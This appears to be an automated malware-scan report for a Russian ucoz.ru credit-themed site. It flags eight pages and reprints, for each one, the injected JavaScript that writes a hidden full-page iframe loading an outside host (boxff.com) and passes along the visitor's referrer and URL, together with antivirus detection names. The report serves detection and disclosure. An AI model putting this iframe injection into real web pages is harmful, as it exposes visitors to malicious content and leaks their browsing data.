Malware Scanner report for kreditrchpqi.ucoz.ru

Malicious/Suspicious/Total urls checked: 8/0/15

8 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/8

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://kreditrchpqi.ucoz.ru/news/karta_tinkov_maj/2014-11-10-784	200 OK Content-Length: 70420 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½">'); Antivirus reports: Avast HTML:Framer-inf [Trj] Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Tadtruss.A GData HTML:Framer-inf
http://s85.ucoz.net/src/jquery-1.7.2.js	200 OK Content-Length: 94840 Content-Type: text/javascript	clean
http://s85.ucoz.net/src/ulightbox/ulightbox.js	200 OK Content-Length: 22097 Content-Type: text/javascript	clean
http://s85.ucoz.net/src/uwnd.js?2	200 OK Content-Length: 228554 Content-Type: text/javascript	clean
http://s85.ucoz.net/src/socCom.js	200 OK Content-Length: 6344 Content-Type: text/javascript	clean
http://s85.ucoz.net/cgi/uutils.fcg?a=soc_comment_get_data&site=0kreditrchpqi	200 OK Content-Length: 529 Content-Type: application/javascript	clean
http://kreditrchpqi.ucoz.ru/	200 OK Content-Length: 61536 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½">'); Antivirus reports: Avast HTML:Framer-inf [Trj] Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Tadtruss.A GData HTML:Framer-inf
http://kreditrchpqi.ucoz.ru/register	200 OK Content-Length: 27887 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½">'); Antivirus reports: Avast HTML:Framer-inf [Trj] Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Tadtruss.A GData HTML:Framer-inf
http://kreditrchpqi.ucoz.ru/test404page.js	404 Not Found Content-Length: 6869 Content-Type: text/html	clean
http://kreditrchpqi.ucoz.ru/news/rss/	200 OK Content-Length: 300246 Content-Type: text/xml	clean
http://kreditrchpqi.ucoz.ru/news/kredit_potrebitelskij_sberbank/2014-11-10-797	200 OK Content-Length: 72469 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½">'); Antivirus reports: Avast HTML:Framer-inf [Trj] Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Tadtruss.A GData HTML:Framer-inf
http://kreditrchpqi.ucoz.ru/news/2014-00	200 OK Content-Length: 32053 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½">'); Antivirus reports: Avast HTML:Framer-inf [Trj] Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Tadtruss.A GData HTML:Framer-inf
http://kreditrchpqi.ucoz.ru/news/2014-01-10	200 OK Content-Length: 83254 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½">'); Antivirus reports: Avast HTML:Framer-inf [Trj] Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Tadtruss.A GData HTML:Framer-inf
http://kreditrchpqi.ucoz.ru/news/2014-01	200 OK Content-Length: 33967 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½">'); Antivirus reports: Avast HTML:Framer-inf [Trj] Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Tadtruss.A GData HTML:Framer-inf
http://kreditrchpqi.ucoz.ru/news/2014-1-31	200 OK Content-Length: 83138 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="100%" height="1000" frameborder="NO" src="http://boxff.com/in.cgi?11&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½">'); Antivirus reports: Avast HTML:Framer-inf [Trj] Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/Tadtruss.A GData HTML:Framer-inf

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: kreditrchpqi.ucoz.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Jul 2015 10:19:37 GMT
Server: uServ/3.2.2
Content-Length: 61536
Content-Type: text/html; charset=UTF-8

...61536 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: kreditrchpqi.ucoz.ru
Referer: http://www.google.com/search?q=kreditrchpqi.ucoz.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=kreditrchpqi.ucoz.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://kreditrchpqi.ucoz.ru/

Result: kreditrchpqi.ucoz.ru is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for kreditrchpqi.ucoz.ru

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools